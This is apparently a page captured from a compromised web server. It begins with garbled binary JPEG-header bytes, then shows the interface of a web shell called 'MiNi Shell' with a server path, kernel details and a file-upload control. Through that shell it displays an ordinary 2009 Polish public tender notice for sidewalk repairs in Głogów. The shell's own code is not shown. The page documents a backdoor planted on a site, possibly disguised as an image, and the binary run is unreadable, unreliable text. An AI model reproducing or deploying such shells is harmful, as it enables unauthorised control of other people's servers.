JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090310/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090310/57004-N-2009.html

<p class="kh_header"><b>Głogów: Remont nawierzchni chodnika przy Placu 1000-lecia od strony dworca BUS przystanków (od Al.Wolności do PKP) w Głogowie</b><br>
<b>Numer ogłoszenia: 57004 - 2009; data zamieszczenia: 10.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Głogów , ul. Rynek 10, 67-200 Głogów, woj. dolnośląskie, tel. 076 7265437, 527, faks 076 7265437.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.glogow.sbip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont nawierzchni chodnika przy Placu 1000-lecia od strony dworca BUS przystanków (od Al.Wolności do PKP) w Głogowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> - rozebranie chodników z płyt betonowych 50 x 50                                                      2.287,30 m2
- rozebranie krawężników                                                                                                     27,50 m
- chodniki z kostki betonowej gr 8 cm                                                                               120,00 m2
- regulacja krawężników   kamiennych                                                                              150,00 m
- ustawienie krawężników betonowych                                                                                27,50 m
- chodniki z kostki betonowej gr 6 cm                                                                            2.287,26 m2
- naprawa schodów  z wykonaniem zjazdów                                                                         4,00 m3
- regulacja pionowa włazów i studzienek                                                                             14 szt
- naprawa naświetli                                                                                                                   4 m3                                                          
Szczegółowy zakres zamówienia określa   przedmiar robót.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.61-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 6000,- zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1)	Spełniają wymogi art. 22 ust. 1 ustawy pzp
2)	Nie podlegają wykluczeniu na podstawie art. 24 ust.1 i 2 ustawy pzp
3)	Wykonali w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania , a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, roboty budowlane odpowiadające swym rodzajem robotom budowlanym stanowiącym przedmiot zamówienia. Zamawiający za robotę podobną uzna  robotę polegającą na wykonaniu w jednym zadaniu nawierzchni z kostki brukowej betonowej o powierzchni  co najmniej 2.200 m2
4)	Dysponują lub będą dysponować osobami  posiadającymi uprawnienia  do:
-	kierowania robotami budowlanymi w specjalności drogowej w zakresie niezbędnym do wykonania zamówienia,
-	posiadającymi aktualne zaświadczenie o przynależności do OIIB,
5)	Posiadają środki finansowe w wysokości co najmniej 130.000,00 zł lub zdolność kredytową w wysokości co najmniej 130.000,00 zł .
6)	Posiadają ubezpieczenie OC w zakresie prowadzonej działalności .

Zamawiający dokona oceny spełnienia warunków na podstawie oświadczeń i dokumentów na zasadzie spełnia -nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)	Formularz oferty - zał. Nr 1 do SIWZ.
2)	Protokół z wizji terenu objętego zamówieniem potwierdzony przez inspektora nadzoru.
3)	Kosztorys ofertowy opracowany metodą szczegółową.
Uwaga !
Podane przy poszczególnych pozycjach przedmiaru numery katalogów mają jedynie charakter informacyjny.
Wykonawca ma prawo stosować przy wycenie poszczególnych pozycji przedmiaru
kalkulację własną.
4)	Harmonogram rzeczowo-finansowy  (Zamawiający zastrzega sobie prawo na etapie  
      podpisywania umowy dokonania aktualizacji harmonogramu rzeczowo-finansowego). 
5)	Dowód wniesienia  wadium.
6)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do 
      ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru 
      lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 
      miesięcy przed upływem terminu składania ofert.
Zaświadczenie o wpisie do ewidencji działalności gospodarczej musi posiadać adnotację właściwego organu wydającego to zaświadczenie o aktualności zapisów - dokonaną w terminie jak wyżej.
7)	Wykonawcy wspólnie ubiegający się o zmówienie zobowiązani są złożyć do wniosku:
.	Pełnomocnictwo udzielone jednemu z partnerów, przez pozostałych wykonawców,     do reprezentowania ich w przedmiotowym postępowaniu albo reprezentowaniu                w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,
.	Jeżeli oferta wykonawców wspólnie ubiegających się o zamówienie zostanie wybrana, Zamawiający zażąda przed zawarciem umowy ,umowę regulującą współpracę tych wykonawców.
7)   Oświadczenie  o spełnieniu warunków udziału w postępowaniu w trybie art.22 pzp - zał.
       Nr do SIWZ,   
8)   Dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają 
       wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
       - zgodnie z załącznikiem Nr 4 do SIWZ              
9)  Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego
       oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia 
       Społecznego  potwierdzające odpowiednio, że  wykonawca nie zalega z opłacaniem 
        podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub    
        zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na   
        raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego  
        organu  -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania  
        ofert.               
10) Informacji na temat przeciętnej liczby zatrudnionych pracowników lub liczebność 
     personelu kierowniczego w okresie ostatnich 3-ch lat, a w przypadku gdy okres  
     prowadzenia działalności jest krótszy - w tym okresie - zał Nr 4 do SIWZ.
11) Wykazu osób lub pisemne zobowiązanie innych podmiotów do udostępnienia osób 
       zdolnych do wykonania zamówienia, jeżeli w wykazie wykonawca wskazał osoby 
       którymi będzie dysponował i które  będą uczestniczyć w wykonywaniu zamówienia   
       wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia 
       i wykształcenia niezbędnych  do wykonania zamówienia, a także zakresu wykonywanych 
       przez nich czynności -     zał. Nr 4 do SIWZ , 
12)Informacja nt. części zamówienia jakie wykonawca zamierza powierzyć 
podwykonawcom- zał Nr 5 do SIWZ.
13) wykazu wykonanych robót budowlanych  w okresie ostatnich pięciu lat przed dniem   
      wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres  prowadzenia    
      działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem  i wartością 
      robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz 
      daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te 
      zostały wykonane należycie,- zał. Nr 3 do SIWZ,
14) Informacja banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w którym 
       wykonawca posiada rachunek, potwierdzająca wysokość  posiadanych środków  
       finansowych w wysokości co najmniej 130.000,00 - zł.   lub   zdolność kredytową 
      wykonawcy na kwotę co najmniej 130.000,00 zł. wystawiona  nie wcześniej  niż 3 
      miesiące przed upływem terminu składania ofert,
 15) Polisy, a w przypadku jej braku innego dokumentu  potwierdzającego, że  wykonawca  
      jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.glogow.sbip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski Rynek 10 67-200 Głogów pok.314.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.04.2009 godzina 09:00, miejsce: Urząd Miejski Rynek 10 67-200 Głogów pok.314.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com